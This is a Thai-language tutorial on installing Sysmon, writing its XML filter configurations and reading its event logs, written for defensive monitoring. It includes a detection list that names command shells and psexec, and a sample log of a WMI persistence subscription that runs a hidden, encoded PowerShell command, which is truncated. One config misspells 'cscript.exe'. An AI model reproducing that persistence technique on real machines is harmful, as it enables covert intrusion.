Sysmon เป็น Windows Service ที่เมื่อติดตั้งไปแล้วมันจะคอย monitor และ log system activity ต่างๆไปยัง Windows Event Log แตกต่างกับ Antivirus/HIDS(Host-based Intrusion Detection System) ตรงที่ Sysmon จะ monitor ได้ลึกกว่า และกำหนดเงื่อนไขในการ log ได้ดีในการโจมตีที่ซับซ้อนมากๆ และการโจมตีที่เจาะจง
Sysmon ใช้งาน device driver และ service รันแบบ background และ load ทุกๆครั้งที่มีการ boot เครื่องขึ้นมา
Sysmon Tags และ Events ต่างๆ
ID | Tag | Event |
1 | ProcessCreate | Process Create |
2 | FileCreateTime | File creation time |
3 | NetworkConnect | Network connection detected |
4 | n/a | Sysmon service state change (cannot be filtered) |
5 | ProcessTerminate | Process terminated |
6 | DriverLoad | Driver Loaded |
7 | ImageLoad | Image loaded |
8 | CreateRemoteThread | CreateRemoteThread detected |
9 | RawAccessRead | RawAccessRead detected |
10 | ProcessAccess | Process accessed |
11 | FileCreate | File created |
12 | RegistryEvent | Registry object added or deleted |
13 | RegistryEvent | Registry value set |
14 | RegistryEvent | Registry object renamed |
15 | FileCreateStreamHash | File stream created |
16 | n/a | Sysmon configuration change (cannot be filtered) |
17 | PipeEvent | Named pipe created |
18 | PipeEvent | Named pipe connected |
Sysmon XML Conditions
Condition | Description |
Is | Default, values are equals |
is not | Values are different |
Contains | The field contains this value |
Excludes | The field does not contain this value |
begin with | The field begins with this value |
end with | The field ends with this value |
less than | Lexicographical comparison is less than zero |
more than | Lexicographical comparison is more than zero |
Image | Match an image path (full path or only image name). For example: lsass.exe will match c:\windows\system32\lsass.exe |
วิธีการติดตั้ง Sysmon
1. download Sysmon จาก Microsoft
1 |
https://technet.microsoft.com/en-us/sysinternals/sysmon |
2. เปิด cmd.exe โดยใช้สิทธิ์ administrator
3. ติดตั้ง Sysmon service โดยใช้คำสั่ง
1 |
sysmon.exe -i -accepteula -h md5,sha256,imphash -l -n |
- -i คือการติดตั้ง service
- -accepteula คือการยินยอมตาม agreement
- -h คือการกำหนดรูปแบบของ hash ที่จะใช้เมื่อทำ image identifications
- -l คือการ log การ load module ใดๆ
- -n คือการ log การใช้งาน network ใดๆ
4. เปิด Event Viewer ขึ้นมาโดยใช้สิทธิ์ administrator
1 |
eventvwr |
5. ไปที่ Applications and Services Logs > Microsoft > Windows > Sysmon > Operational ก็จะพบ log ของ Sysmon อยู่ในนั้น
6. เราสามารถตรวจสอบได้ว่า Sysmon ตอนนี้ใช้ configuration แบบใดอยู่ โดยใช้คำสั่งเป็น
1 |
sysmon.exe -c |
7. หากต้องการ custom configuration สามารถทำได้เช่นกัน โดยในที่นี้ผมจะใช้ configuration เป็น
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 |
<Sysmon schemaversion="3.30"> <!-- Capture all hashes --> <HashAlgorithms>*</HashAlgorithms> <EventFiltering> <!-- Event ID 1 == Process Creation. Log all newly created processes except --> <ProcessCreate onmatch="exclude"> <Image condition="contains">splunk</Image> <Image condition="contains">btool.exe</Image> <Image condition="contains">SnareCore</Image> <Image condition="contains">nxlog</Image> <Image condition="contains">winlogbeat</Image> <Image condition="contains">Microsoft Monitoring Agent\Agent\MonitoringHost.exe</Image> <Image condition="begin with">C:\Program Files\NVIDIA Corporation\Display\</Image> <Image condition="is">C:\Program Files\Dell\SupportAssist\pcdrcui.exe</Image> <Image condition="is">C:\Program Files\Dell\SupportAssist\koala.exe</Image> <Image condition="begin with">C:\Program Files\Windows Defender</Image> <Image condition="is">C:\Windows\System32\audiodg.exe</Image> <Image condition="is">C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe</Image> <Image condition="is">C:\Program Files (x86)\Google\Update\GoogleUpdate.exe</Image> <Image condition="end with">\Sysmon.exe</Image> </ProcessCreate> <!-- Event ID 2 == File Creation Time. Do not log file modified creation time --> <FileCreateTime onmatch="include"/> <!-- Event ID 3 == Network Connection. Log all initiated network connection except --> <NetworkConnect onmatch="exclude"> <Image condition="is">C:\Program Files\Microsoft Office\Office15\ONENOTE.EXE</Image> <Image condition="end with">Spotify.exe</Image> <Image condition="end with">OneDrive.exe</Image> <Image condition="end with">AppData\Roaming\Dashlane\Dashlane.exe</Image> <Image condition="end with">AppData\Roaming\Dashlane\DashlanePlugin.exe</Image> <Image condition="end with">winlogbeat.exe</Image> <Image condition="is">C:\Windows\System32\spoolsv.exe</Image> <Image condition="is">C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exe</Image> <Image condition="is">C:\Program Files (x86)\Common Files\Acronis\SyncAgent\syncagentsrv.exe</Image> <Image condition="is">C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe</Image> <Image condition="is">C:\Windows\System32\CompatTelRunner.exe</Image> <Image condition="is">C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\LMS\LMS.exe</Image> <Image condition="is">C:\Program Files (x86)\Google\Chrome\Application\chrome.exe</Image> <Image condition="is">C:\Windows\System32\mmc.exe</Image> </NetworkConnect> <!-- Event ID 5 == Process Terminated. Do not log processes terminated --> <ProcessTerminate onmatch="include"/> <!-- Event ID 6 == Driver Loaded. Log all drivers except those with the following signatures --> <DriverLoad onmatch="exclude"> <Signature condition="contains">microsoft</Signature> <Signature condition="contains">windows</Signature> <Signature condition="is">VMware</Signature> <Signature condition="begin with">Intel </Signature> </DriverLoad> <!-- Event ID 7 == Image Loaded. Log everything except --> <ImageLoad onmatch="exclude"> <Image condition="image">chrome.exe</Image> <Image condition="image">vmtoolsd.exe</Image> <Image condition="image">Sysmon.exe</Image> <Image condition="image">mmc.exe</Image> <Image condition="is">C:\Program Files (x86)\Google\Update\GoogleUpdate.exe</Image> <Image condition="is">C:\Windows\System32\taskeng.exe</Image> </ImageLoad> <!-- Event ID 8 == CreateRemoteThread. Log everything --> <CreateRemoteThread onmatch="exclude" /> <!-- Event ID 9 == RawAccessRead. Log everything --> <RawAccessRead onmatch="exclude"> <Image condition="is">C:\Program Files\VMware\VMware Tools\vmtoolsd.exe</Image> <Image condition="is">C:\Program Files (x86)\Google\Update\GoogleUpdate.exe</Image> <Image condition="end with">\Sysmon.exe</Image> </RawAccessRead> <!-- Event ID 10 == ProcessAccess. Log everything except --> <ProcessAccess onmatch="exclude"> <SourceImage condition="is">C:\Program Files\VMware\VMware Tools\vmtoolsd.exe</SourceImage> <SourceImage condition="is">C:\Windows\system32\taskeng.exe</SourceImage> <SourceImage condition="is">C:\Windows\system32\lsass.exe</SourceImage> <SourceImage condition="image">Sysmon.exe</SourceImage> </ProcessAccess> <!-- Event ID 11 == FileCreate. Log everything except --> <FileCreate onmatch="exclude"> <Image condition="image">SearchIndexer.exe</Image> <Image condition="image">winlogbeat.exe</Image> <Image condition="is">C:\Windows\system32\mmc.exe</Image> <Image condition="is">C:\Program Files (x86)\Google\Chrome\Application\chrome.exe</Image> </FileCreate> <!-- Event ID 12,13,14 == RegObject added/deleted, RegValue Set, RegObject Renamed. Log everything except --> <RegistryEvent onmatch="exclude"> <Image condition="is">C:\Program Files\VMware\VMware Tools\vmtoolsd.exe</Image> <Image condition="is">C:\Windows\system32\mmc.exe</Image> <Image condition="is">C:\Windows\system32\taskeng.exe</Image> <Image condition="is">C:\Windows\System32\svchost.exe</Image> <Image condition="is">C:\Windows\system32\lsass.exe</Image> <Image condition="is">C:\Windows\Sysmon.exe</Image> </RegistryEvent> <!-- Event ID 15 == FileStream Created. Do not log when a file stream is created neither the hash of the contents of the stream --> <FileCreateStreamHash onmatch="include" /> <!-- Event ID 17 == PipeEvent. Log Named pipe created & Named pipe connected --> <PipeEvent onmatch="exclude" /> </EventFiltering> </Sysmon> |
หากต้องการ log ทั้งหมดจะใช้เป็น
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 |
<Sysmon schemaversion="3.30"> <!-- Capture all hashes --> <HashAlgorithms>*</HashAlgorithms> <EventFiltering> <ProcessCreate onmatch="exclude"/> <FileCreateTime onmatch="exclude"/> <NetworkConnect onmatch="exclude"/> <ProcessTerminate onmatch="exclude"/> <DriverLoad onmatch="exclude"/> <ImageLoad onmatch="exclude"/> <CreateRemoteThread onmatch="exclude" /> <RawAccessRead onmatch="exclude"/> <ProcessAccess onmatch="exclude"/> <FileCreate onmatch="exclude"/> <RegistryEvent onmatch="exclude"/> <FileCreateStreamHash onmatch="exclude" /> <PipeEvent onmatch="exclude" /> </EventFiltering> </Sysmon> |
อีกระดับ
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 |
<Sysmon schemaversion="3.20"> <HashAlgorithms>md5,imphash</HashAlgorithms> <EventFiltering> <ProcessCreate onmatch="include"> <Image condition="contains">cmd.exe</Image> <Image condition="contains">powershell.exe</Image> <Image condition="contains">wmic.exe</Image> <Image condition="contains">cscirpt.exe</Image> <Image condition="contains">wscript.exe</Image> <Image condition="contains">net.exe</Image> <Image condition="contains">psexec.exe</Image> <ParentImage condition="contains">cmd.exe</ParentImage> <ParentImage condition="contains">powershell.exe</ParentImage> <ParentImage condition="contains">wmic.exe</ParentImage> <ParentImage condition="contains">cscirpt.exe</ParentImage> <ParentImage condition="contains">wscript.exe</ParentImage> <ParentImage condition="contains">net.exe</ParentImage> <ParentImage condition="contains">psexec.exe</ParentImage> <ParentImage condition="contains">explorer.exe</ParentImage> </ProcessCreate> </EventFiltering> </Sysmon> |
โดยใน configuration นี้จะเป็นไปตามตารางอ้างอิงด้านบน และมีการ exclude process บาง process เพื่อให้เกิด false ในการ monitor น้อยลง โดยผม save เป็นไฟล์ start.xml จากนั้นใช้คำสั่ง
1 |
sysmon -c start.xml |
เมื่อทำการ log จะโผล่ที่
1 |
C:\Windows\System32\winevt\Logs\Microsoft-Windows-Sysmon%4Operational.evtx |
Log สามารถดูได้โดยใช้โปรแกรม SysmonView
ตัวอย่าง Sysmon Log
EventID | Type | Available Since | Example |
---|---|---|---|
1 | CreateProcess | – | CommandLine: C:\\Windows\\system32\\wbem\\wmiprvse.exe -secured -Embedding CurrentDirectory: C:\\Windows\\system32\\ Hashes: SHA1=9F5A4796B58D8B104A1C0F5A63DAF0032B947966, MD5=619A67C9F617B7E69315BB28ECD5E1DF, SHA256=F34F231D117CCDFEBB9CB35C8D6FDFA7051DA27FDC1204FCCFF361FC0B13A0FF, IMPHASH=C1E65C7FF153F2C2E6A7E93706AE226A Image: C:\\Windows\\System32\\wbem\\WmiPrvSE.exe IntegrityLevel: System LogonGuid: 49F1AF32-4E56-59BD-0000-0020E4030000 LogonId: 0x000003e4 ParentCommandLine: C:\\Windows\\system32\\svchost.exe -k DcomLaunch ParentImage: C:\\Windows\\System32\\svchost.exe ParentProcessGuid: 49F1AF32-4E56-59BD-0000-00104E830000 ParentProcessId: 600 ProcessGuid: 49F1AF32-882C-59C1-0000-00108FA14600 ProcessId: 3204 TerminalSessionId: 0 User: NT AUTHORITY\\NETWORK SERVICE UtcTime: 2017-09-19 21:12:12.727 |
2 | FileCreateTime | – | CreationUtcTime: 2017-09-18 07:50:46.104 Image: C:\\Program Files\\Mozilla Firefox\\firefox.exe PreviousCreationUtcTime: 2017-09-19 21:16:37.524 ProcessGuid: 49F1AF32-8663-59C1-0000-001062293400 ProcessId: 1396 TargetFilename: C:\\Users\\Gen Eric\\AppData\\Roaming\\Microsoft\\Windo ws\\Recent\\CustomDestinations\\BE2KF8TBMP786WCR1WSN.temp UtcTime: 2017-09-19 21:16:37.540 |
3 | NetworkConnect | – | DestinationHostname: DestinationIp: 192.168.56.1 DestinationIsIpv6: false DestinationPort: 8080 DestinationPortName: Image: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe Initiated: true ProcessGuid: 49F1AF32-8A4D-59C1-0000-001042F00A00 ProcessId: 3888 Protocol: tcp SourceHostname: GenEric-PC SourceIp: 192.168.56.101 SourceIsIpv6: false SourcePort: 49252 SourcePortName: User: NT AUTHORITY\\SYSTEM UtcTime: 2017-09-19 21:25:51.846 |
4 | – | – | SchemaVersion: 3.40 State: Started UtcTime: 2017-09-19 21:17:08.820 Version: 6.10 |
5 | ProcessTerminate | – | Image: C:\\Windows\\SysWOW64\\runonce.exe ProcessGuid: 49F1AF32-8956-59C1-0000-001099830200 ProcessId: 2100 UtcTime: 2017-09-19 21:17:12.434 |
6 | DriverLoad | – | Hashes: SHA1=706C6BB3AD9E24F148EE110984814897383BDC32, MD5=9B38580063D281A99E68EF5813022A5F, SHA256=D91676B0E0A8E2A090E3E5DD340ABCFC20AE0F55B4C82869D6CFB34239BD27DA, IMPHASH=6126B7C1BE78663C7C2231BA8607D577 ImageLoaded: C:\\Windows\\System32\\drivers\\dfsc.sys Signature: Microsoft Windows SignatureStatus: Valid Signed: true UtcTime: 2017-09-19 21:17:01.171 |
7 | ImageLoad | – | Hashes: SHA1=49D4F6E96FD4D810D26E5166991070CFC32298AB, MD5=FBE1086227040618A569C27F74A12F3D, SHA256=1631C78ED9C35EB62FC66ECBB536B251329134A866A783875AEE7D85C7DD0E02, IMPHASH=1EC347D133DF2FE4DA3E5F8944CAEAE8 Image: C:\\Windows\\System32\\CompatTelRunner.exe ImageLoaded: C:\\Windows\\System32\\ws2_32.dll ProcessGuid: 49F1AF32-884D-59C1-0000-001044E84800 ProcessId: 3236 Signature: Microsoft Windows SignatureStatus: Valid Signed: true UtcTime: 2017-09-19 21:12:45.821 |
8 | CreateRemoteThread | – | NewThreadId: 3384 SourceImage: C:\\Windows\\System32\\wbem\\WmiPrvSE.exe SourceProcessGuid: 49F1AF32-8955-59C1-0000-00105DF90100 SourceProcessId: 1956 StartAddress: 0x0000000077533860 StartFunction: StartModule: C:\\Windows\\SYSTEM32\\ntdll.dll TargetImage: C:\\Windows\\System32\\wbem\\WmiApSrv.exe TargetProcessGuid: 49F1AF32-89D7-59C1-0000-00106D100A00 TargetProcessId: 3196 UtcTime: 2017-09-19 21:19:20.228 |
9 | RawAccessRead | – | Device: \\Device\\HarddiskVolume2 Image: C:\\Windows\\System32\\smss.exe ProcessGuid: 49F1AF32-894D-59C1-0000-0010002E0000 ProcessId: 264 UtcTime: 2017-09-19 21:17:01.359 |
10 | ProcessAccess | – | CallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+4bf9a|C:\\Windows\\system32 \\KERNELBASE.dll+189b7|C:\\Windows\\System32\\VBoxService.exe+1009d|C:\\Windows\ \System32\\VBoxService.exe+11374|C:\\Windows\\System32\\VBoxService.exe+1161e|C: \\Windows\\System32\\VBoxService.exe+e7fb|C:\\Windows\\System32\\VBoxService.exe +f27b|C:\\Windows\\System32\\VBoxService.exe+181e|C:\\Windows\\System32\\VBoxSer vice.exe+2d4af|C:\\Windows\\System32\\VBoxService.exe+30bd2|C:\\Windows\\System3 2\\VBoxService.exe+6c24b|C:\\Windows\\System32\\VBoxService.exe+6c2df|C:\\Window s\\system32\\kernel32.dll+159cd|C:\\Windows\\SYSTEM32\\ntdll.dll+2a561 GrantedAccess: 0x1400 SourceImage: C:\\Windows\\System32\\VBoxService.exe SourceProcessGUID: 49F1AF32-4E56-59BD-0000-00108BCA0000 SourceProcessId: 664 SourceThreadId: 696 TargetImage: C:\\Windows\\system32\\csrss.exe TargetProcessGUID: 49F1AF32-4E55-59BD-0000-0010FB560000 TargetProcessId: 340 UtcTime: 2017-09-19 21:14:34.790 |
11 | FileCreate | – | CreationUtcTime: 2017-09-07 21:43:40.859 Image: C:\\Windows\\System32\\smss.exe ProcessGuid: 49F1AF32-894D-59C1-0000-0010002E0000 ProcessId: 264 TargetFilename: C:\\pagefile.sys UtcTime: 2017-09-19 21:17:02.343 |
12 | RegistryEvent | – | EventType: CreateKey Image: C:\\Windows\\Sysmon.exe ProcessGuid: 49F1AF32-4E59-59BD-0000-001021720100 ProcessId: 1332 TargetObject: HKU\\.DEFAULT\\SOFTWARE\\Policies\\Microsoft\\SystemCerti ficates\\Disallowed\\CRLs UtcTime: 2017-09-19 21:14:42.915 |
13 | RegistryEvent | – | Details: DWORD (0xffffffff) EventType: SetValue Image: C:\\Windows\\system32\\CompatTelRunner.exe ProcessGuid: 49F1AF32-884D-59C1-0000-001093F04800 ProcessId: 616 TargetObject: \\REGISTRY\\A\\{5F82DC26-E525-476B-D7F4-86FAF0C848CE}\\Ro ot\\DeviceCensus\\WU\\AppStoreAutoUpdatePolicy UtcTime: 2017-09-19 21:12:46.212 |
14 | RegistryEvent | – | EventType: RenameKey Image: C:\\Windows\\regedit.exe NewName: \\REGISTRY\\MACHINE\\SOFTWARE\\Macromedia\\RegistryRenamed ProcessGuid: 49F1AF32-22C3-59C2-0000-001085501200 ProcessId: 3800 TargetObject: HKLM\\SOFTWARE\\Macromedia\\FlashPlayerActiveX UtcTime: 2017-09-20 08:14:21.370 |
15 | FileCreateStreamHash | – | CreationUtcTime: 2017-09-20 08:06:11.801 Hash: SHA1=17DC34358A2BF7E7D6E78268B3CA7493915BB325, MD5=9D9D384EF6546192D60EFDBB8397CD2D, SHA256=3455A37D9006F5325AC6208E874AE8149FECD8631D981EE78B3AD5B06AD648AB, IMPHASH=00000000000000000000000000000000 Image: C:\\Windows\\system32\\cmd.exe ProcessGuid: 49F1AF32-21E3-59C2-0000-00106B811000 ProcessId: 4000 TargetFilename: C:\\Users\\GENERI~1\\AppData\\Local\\Temp\\test.txt:mal icious.txt UtcTime: 2017-09-20 08:10:29.925 |
16 | – | – | Not Seen |
17 | PipeEvent | v6.0 | Image: C:\\Windows\\system32\\svchost.exe PipeName: \\PIPE_EVENTROOT\\CIMV2SCM EVENT PROVIDER ProcessGuid: 49F1AF32-8952-59C1-0000-0010CAE70000 ProcessId: 920 UtcTime: 2017-09-19 21:17:20.970 |
18 | PipeEvent | v6.0 | Image: C:\\Windows\\Explorer.EXE PipeName: \\lsass ProcessGuid: 49F1AF32-8955-59C1-0000-00106FEA0100 ProcessId: 1932 UtcTime: 2017-09-19 21:24:27.017 |
19 | WmiEvent | v6.10 | EventNamespace: \root\\\\CimV2\ EventType: WmiFilterEvent Name: \MaliciousSubscription\ Operation: Created Query: \SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE Targ etInstance ISA ‘Win32_PerfFormattedData_PerfOS_System’ AND TargetInstance.System UpTime >= 240 AND TargetInstance.SystemUpTime < 325\ User: GenEric-PC\\Gen Eric UtcTime: 2017-09-19 21:10:00.401 |
20 | WmiEvent | v6.10 | Destination: \C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\ \\powershell.exe -NonI -W hidden -enc JABHAHIAbwBVAFAAUABvAGwAaQBjAHkAUwBlAFQAVA […] AkAEsAKQApAHwASQBFAFgA\ EventType: WmiConsumerEvent Name: \MaliciousSubscription\ Operation: Created Type: Command Line User: GenEric-PC\\Gen Eric UtcTime: 2017-09-19 21:10:00.431 |
21 | WmiEvent | v6.10 | Consumer: \CommandLineEventConsumer.Name=\\\MaliciousSubscription\\\\ EventType: WmiBindingEvent Filter: \__EventFilter.Name=\\\MaliciousSubscription\\\\ Operation: Created User: GenEric-PC\\Gen Eric UtcTime: 2017-09-19 21:10:11.878 |
Source::
- Cyberwardog.blogspot.com
- https://www.crowdstrike.com/blog/sysmon-2/
- https://www.rsaconference.com/writable/presentations/file_upload/hta-w05-tracking_hackers_on_your_network_with_sysinternals_sysmon.pdf
- https://medium.com/@haggis_m/hunting-with-sysmon-38de012e62e6
- https://nosecurecode.blog/2017/06/10/updated-sysmonview/
- http://909research.com/sysmon-the-best-free-windows-monitoring-tool-you-arent-using/
- https://github.com/Neo23x0/sigma/tree/master/rules/windows/sysmon
- https://github.com/nshalabi/SysmonTools
Great Sysmon Use Cases
- BotConf2016 Advanced Incident Detection and Threat Hunting using Sysmon (and Splunk) Tom Ueltschi 2016 (Slides)
- BotConf2016 Advanced Incident Detection and Threat Hunting using Sysmon (and Splunk) Tom Ueltschi 2016 (Video)
- Microsoft Sysmon Deployment 2017 – Dimitris Margaritis (slides)
- Splunkmon – Takin Sysmon to the Next Level (Whitepaper)
- Posh-Sysmon Module for Creating Sysmon Configuration Files 2017(Article)
- How to Go from Responding to Hunting with Sysinternals Sysmon RSAC 2017 (Slides)
- Hunting with Sysmon – Michael Haag 2017 (Article)
- Sysmon-dfir – Michael Haggis (Github)
- Sysinternals Sysmon unleashed (Article)
- SwiftOnSecurity – Sysmon Config 2017 (Github)
- Explaining and adapting Tay’s Sysmon Configuration (Article)